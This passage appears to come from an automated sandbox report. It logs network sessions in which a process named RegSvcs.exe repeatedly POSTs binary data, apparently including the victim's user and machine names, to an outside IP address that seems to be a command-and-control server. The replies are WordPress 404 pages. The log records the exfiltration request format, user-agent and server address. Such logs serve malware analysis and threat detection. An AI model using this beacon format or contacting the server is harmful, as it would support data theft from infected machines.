                                            May 29, 2024 15:42:28.595417976 CEST1236INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:42:28.595432997 CEST896INData Raw: 72 3a 23 33 32 33 37 33 63 3b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 39 39 39 39 70 78 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 6e 6f 6e 65 3b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 63 61 6c 63 28 2e
                                            Data Ascii: r:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none}</style><style id='global-styles-i
                                            May 29, 2024 15:42:28.595541954 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:42:28.595556974 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:42:28.595607996 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:42:28.595635891 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo
                                            May 29, 2024 15:42:28.595663071 CEST1236INData Raw: 6d 69 6e 6f 75 73 2d 76 69 76 69 64 2d 6f 72 61 6e 67 65 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 6c 75
                                            Data Ascii: minous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-lig


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            7192.168.2.94972145.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:42:28.740547895 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:42:28.746519089 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:42:31.195296049 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:42:29 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:42:31.195326090 CEST1236INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,
                                            May 29, 2024 15:42:31.195338011 CEST1236INData Raw: 65 6e 43 61 6e 76 61 73 28 33 30 30 2c 31 35 30 29 3a 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 63 61 6e 76 61 73 22 29 2c 61 3d 72 2e 67 65 74 43 6f 6e 74 65 78 74 28 22 32 64 22 2c 7b 77 69 6c 6c 52 65 61 64 46 72 65 71 75 65 6e 74 6c
                                            Data Ascii: enCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t
                                            May 29, 2024 15:42:31.195364952 CEST672INData Raw: 75 70 70 6f 72 74 73 5b 74 5d 3d 65 5b 74 5d 2c 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 3d 6e 2e 73 75 70 70 6f 72 74 73 2e 65 76 65 72 79 74 68 69 6e 67 26 26 6e 2e 73 75 70 70 6f 72 74 73 5b 74 5d 2c 22 66 6c 61 67 22 21
                                            Data Ascii: upports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.support
                                            May 29, 2024 15:42:31.195378065 CEST1236INData Raw: 72 74 61 6e 74 3b 0a 09 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d
                                            Data Ascii: rtant;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0.07em !important;vertical-align: -0.1em !important;background: none !important;padding: 0 !important;}
                                            May 29, 2024 15:42:31.195385933 CEST224INData Raw: 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 63 79 61 6e 2d 62 6c 75 65 3a 20 23 38 65 64 31 66 63 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 76 69 76 69 64 2d 63 79 61 6e 2d 62 6c 75 65 3a
                                            Data Ascii: --wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: #9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147
                                            May 29, 2024 15:42:31.195542097 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:42:31.195563078 CEST1236INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-siz
                                            May 29, 2024 15:42:31.195574999 CEST448INData Raw: 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 63 6f 6c 75 6d 6e 73 2e 69 73 2d 6c 61 79 6f 75 74 2d 67 72 69 64 29 7b 67 61 70 3a 20 32 65 6d 3b 7d 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 70 6f 73 74 2d 74 65 6d
                                            Data Ascii: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important
                                            May 29, 2024 15:42:31.195857048 CEST1236INData Raw: 2d 63 6f 6c 6f 72 2d 2d 70 61 6c 65 2d 70 69 6e 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 76 69 76 69 64 2d 72 65 64 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72
                                            Data Ascii: -color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{colo


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            8192.168.2.94972245.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:42:31.346168041 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:42:31.351063013 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:42:33.810412884 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:42:31 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
                                            May 29, 2024 15:42:33.810427904 CEST224INData Raw: 6d 6f 6a 69 22 3a 22 68 74 74 70 3a 5c 2f 5c 2f 34 35 2e 36 31 2e 31 33 37 2e 32 31 35 5c 2f 77 70 2d 69 6e 63 6c 75 64 65 73 5c 2f 6a 73 5c 2f 77 70 2d 65 6d 6f 6a 69 2d 72 65 6c 65 61 73 65 2e 6d 69 6e 2e 6a 73 3f 76 65 72 3d 36 2e 35 2e 33 22
                                            Data Ascii: moji":"http:\/\/45.61.137.215\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.5.3"}};/*! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessio
                                            May 29, 2024 15:42:33.810446978 CEST1236INData Raw: 6e 53 74 6f 72 61 67 65 2e 73 65 74 49 74 65 6d 28 6f 2c 4a 53 4f 4e 2e 73 74 72 69 6e 67 69 66 79 28 74 29 29 7d 63 61 74 63 68 28 65 29 7b 7d 7d 66 75 6e 63 74 69 6f 6e 20 70 28 65 2c 74 2c 6e 29 7b 65 2e 63 6c 65 61 72 52 65 63 74 28 30 2c 30
                                            Data Ascii: nStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.wid
                                            May 29, 2024 15:42:33.810458899 CEST1236INData Raw: 22 73 63 72 69 70 74 22 29 3b 74 2e 73 72 63 3d 65 2c 74 2e 64 65 66 65 72 3d 21 30 2c 69 2e 68 65 61 64 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 7d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 50 72 6f 6d 69 73 65 26 26 28 6f
                                            Data Ascii: "script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",
                                            May 29, 2024 15:42:33.810468912 CEST1236INData Raw: 65 70 74 46 6c 61 67 26 26 21 6e 2e 73 75 70 70 6f 72 74 73 2e 66 6c 61 67 2c 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 31 2c 6e 2e 72 65 61 64 79 43 61 6c 6c 62 61 63 6b 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6e 2e 44 4f 4d 52 65 61 64 79 3d 21 30 7d 7d
                                            Data Ascii: eptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&
                                            May 29, 2024 15:42:33.810487986 CEST672INData Raw: 69 64 3d 27 67 6c 6f 62 61 6c 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0a 62 6f 64 79 7b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 62 6c 61 63 6b 3a 20 23 30
                                            Data Ascii: id='global-styles-inline-css' type='text/css'>body{--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red:
                                            May 29, 2024 15:42:33.810497999 CEST1236INData Raw: 2c 32 32 37 2c 31 29 20 30 25 2c 72 67 62 28 31 35 35 2c 38 31 2c 32 32 34 29 20 31 30 30 25 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 67 72 61 64 69 65 6e 74 2d 2d 6c 69 67 68 74 2d 67 72 65 65 6e 2d 63 79 61 6e 2d 74 6f 2d 76 69 76 69 64
                                            Data Ascii: ,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradie
                                            May 29, 2024 15:42:33.810503960 CEST224INData Raw: 64 69 65 6e 74 2d 2d 65 6c 65 63 74 72 69 63 2d 67 72 61 73 73 3a 20 6c 69 6e 65 61 72 2d 67 72 61 64 69 65 6e 74 28 31 33 35 64 65 67 2c 72 67 62 28 32 30 32 2c 32 34 38 2c 31 32 38 29 20 30 25 2c 72 67 62 28 31 31 33 2c 32 30 36 2c 31 32 36 29
                                            Data Ascii: dient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--w
                                            May 29, 2024 15:42:33.810512066 CEST1236INData Raw: 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6d 65 64 69 75 6d 3a 20 32 30 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 66 6f 6e 74 2d 73 69 7a 65 2d 2d 6c 61 72 67 65 3a 20 33 36 70 78 3b 2d 2d 77 70 2d 2d 70 72 65 73
                                            Data Ascii: p--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5
                                            May 29, 2024 15:42:33.810522079 CEST224INData Raw: 2d 2d 62 6c 61 63 6b 29 20 21 69 6d 70 6f 72 74 61 6e 74 3b 7d 2e 68 61 73 2d 63 79 61 6e 2d 62 6c 75 69 73 68 2d 67 72 61 79 2d 63 6f 6c 6f 72 7b 63 6f 6c 6f 72 3a 20 76 61 72 28 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 63 6f 6c 6f 72 2d 2d 63
                                            Data Ascii: --black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset-


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            9192.168.2.94972345.61.137.215807532C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                            TimestampBytes transferredDirectionData
                                            May 29, 2024 15:42:33.985204935 CEST246OUTPOST /index.php/3b1tenbkyj HTTP/1.0
                                            User-Agent: Mozilla/4.08 (Charon; Inferno)
                                            Host: 45.61.137.215
                                            Accept: */*
                                            Content-Type: application/octet-stream
                                            Content-Encoding: binary
                                            Content-Key: DCC85916
                                            Content-Length: 145
                                            Connection: close
                                            May 29, 2024 15:42:33.991444111 CEST145OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 08 00 00 00 74 00 69 00 6e 00 61 00 01 00 0c 00 00 00 35 00 32 00 38 00 31 00 31 00 30 00 01 00 0e 00 00 00 54 00 49 00 4e 00 41 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 00 01 00 01
                                            Data Ascii: (ckav.rutina528110TINA-PC0FDD42EE188E931437F4FBE2C
                                            May 29, 2024 15:42:36.437865019 CEST1236INHTTP/1.0 404 Not Found
                                            Date: Wed, 29 May 2024 13:42:34 GMT
                                            Server: Apache/2.4.52 (Ubuntu)
                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                            Link: <http://45.61.137.215/index.php/wp-json/>; rel="https://api.w.org/"
                                            Connection: close
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0d 0a 09 3c 68 65 61 64 3e 0d 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 6f 66 69 6c 65 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 67 6d 70 67 2e 6f 72 67 2f 78 66 6e 2f 31 31 22 3e 0d 0a 09 09 0d 0a 09 09 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 26 23 38 32 31 31 3b 20 73 65 70 61 72 61 74 65 64 20 70 61 70 65 72 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 [TRUNCATED]
                                            Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><title>Page not found &#8211; separated paper</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//fonts.googleapis.com' /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Feed" href="http://45.61.137.215/index.php/feed/" /><link rel="alternate" type="application/rss+xml" title="separated paper &raquo; Comments Feed" href="http://45.61.137.215/index.php/comments/feed/" /><script type="text/javascript">/* <![CDATA[ */window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concate
